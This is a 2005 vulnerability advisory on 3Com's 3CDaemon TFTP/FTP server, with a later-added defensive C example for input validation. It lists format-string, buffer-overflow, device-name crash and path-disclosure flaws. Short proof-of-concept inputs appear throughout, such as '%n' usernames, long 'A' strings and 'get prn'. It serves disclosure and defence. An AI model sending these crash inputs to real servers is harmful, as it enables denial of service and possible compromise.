Posted Jan 5, 2005
Authored by Sowhat | Site secway.org

3Com's 3CDaemon 2.0 revision 10 is susceptible to multiple vulnerabilities, including various format string and denial of service flaws.

tags | exploit, denial of service, vulnerability
MD5 | 70f67f8c67fad4e6be72a2ea54c68c6f


3Com 3CDaemon Multiple Vulnerabilities 

By Sowhat

[I.T.S] Security Research Team

Product Affected:

3Com 3CDaemon 2.0 revision 10




3CDaemon is a free, popular TFTP, FTP, and Syslog daemon for Microsoft Windows platforms, developed by dan_gill@3Com.

For more information,

3CDaemon is full of holes. ISS and Wang Ning <nwang@scn.com.cn> have already reported some bugz about 3CDaemon (see: http://xforce.iss.net/xforce/xfdb/8970).

And I document some other well-known bugz here again :)

(2) Details

Remote exploitation of multiple vulnerabilities in 3CDaemon allows an attacker to execute arbitrary commands as the user running 3CDaemon (usually Administrator). Some of these vulnerabilities do not need a valid username and password to log in.

There are several vulnerabilities:

1. TFTP Reserved Device Name Denial of Service

D:\WINDOWS\system32>tftp -i get prn
3CDaemon then crashes with messages like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".

2. FTP Username Format String Vulnerability

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User ( %n
Connection closed by remote host.

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User ( %s
331 User name ok, need password
530 Login access denied
Login failed.

And then the 3CDaemon is dead.

3. FTP Long Username Buffer Overflow

Connected to
220 3Com 3CDaemon FTP Server Version 2.0
User (
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.

4. Multiple FTP Command Long Parameter Buffer Overflow
Including: cd, send, ls, put, delete, rename, rmdir, literal, stat, CWD, and so on
(Maybe this is what ISS's advisory is talking about)

ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.

ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.

ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.

It seems that the length of the "A" string needed is different for each command.

5. Multiple FTP Command Format String
Including: cd, delete, rename, rmdir, literal, stat, CWD, and so on

230 User logged in
ftp> cd %n
Connection closed by remote host.

6. Multiple FTP Command Reserved Device Name Information Leak
Including cd, and so on

The following commands disclose the physical path of 3CDaemon:

ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

Also, a cd to an existing filename discloses the physical path too.

ftp> cd toolz.rar
550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!

There are still some other boring bugz, but it's enough :>
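The three input classes above (reserved device names, overlong parameters, format specifiers in client text) can all be neutralised before an argument reaches a file or string API. The following is an added example, not part of the advisory and not 3Com's code; `MAX_ARG`, `check_arg` and `build_reply` are hypothetical names and limits chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed limit for this example, well under the ~241-byte input reported above. */
#define MAX_ARG 128

enum arg_status { ARG_OK, ARG_TOO_LONG, ARG_RESERVED_DEVICE, ARG_BAD_CHAR };

/* Case-insensitive match of one path component's base name (text before the
   first '.', ':' or separator) against Windows reserved device names. */
static int is_reserved_device(const char *name)
{
    static const char *fixed[] = { "con", "prn", "aux", "nul" };
    char base[8] = {0};
    size_t n = strcspn(name, ".:/\\");
    if (n == 0 || n >= sizeof base) return 0;
    for (size_t i = 0; i < n; i++) base[i] = (char)tolower((unsigned char)name[i]);
    for (size_t i = 0; i < 4; i++)
        if (strcmp(base, fixed[i]) == 0) return 1;
    /* COM1-COM9 and LPT1-LPT9 */
    return n == 4 && (!strncmp(base, "com", 3) || !strncmp(base, "lpt", 3))
           && base[3] >= '1' && base[3] <= '9';
}

/* Check one FTP/TFTP path argument before any file or string API sees it. */
enum arg_status check_arg(const char *arg)
{
    if (strlen(arg) > MAX_ARG) return ARG_TOO_LONG;
    for (const char *p = arg; *p; p++)
        if ((unsigned char)*p < 0x20) return ARG_BAD_CHAR;
    /* Test every path component, so "dir/aux" is caught too. */
    for (const char *p = arg; *p; ) {
        if (is_reserved_device(p)) return ARG_RESERVED_DEVICE;
        p += strcspn(p, "/\\");
        p += strspn(p, "/\\");
    }
    return ARG_OK;
}

/* Build an error reply: client text is only ever a "%s" argument, never the
   format string, and the server's physical path is not echoed back. */
int build_reply(char *out, size_t outsz, const char *arg)
{
    return snprintf(out, outsz, "550 %s: not a directory.\r\n", arg);
}
```

Rejecting the argument in `check_arg` happens before login state matters, which covers the pre-authentication cases (TFTP filename, FTP username) as well as the post-login commands.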


Workaround? No......

(4) Vendor Response

Since it seems that 3Com hasn't maintained 3CDaemon for a long, long time, I didn't contact them :)

Thanks to all the members of ITS Security Team

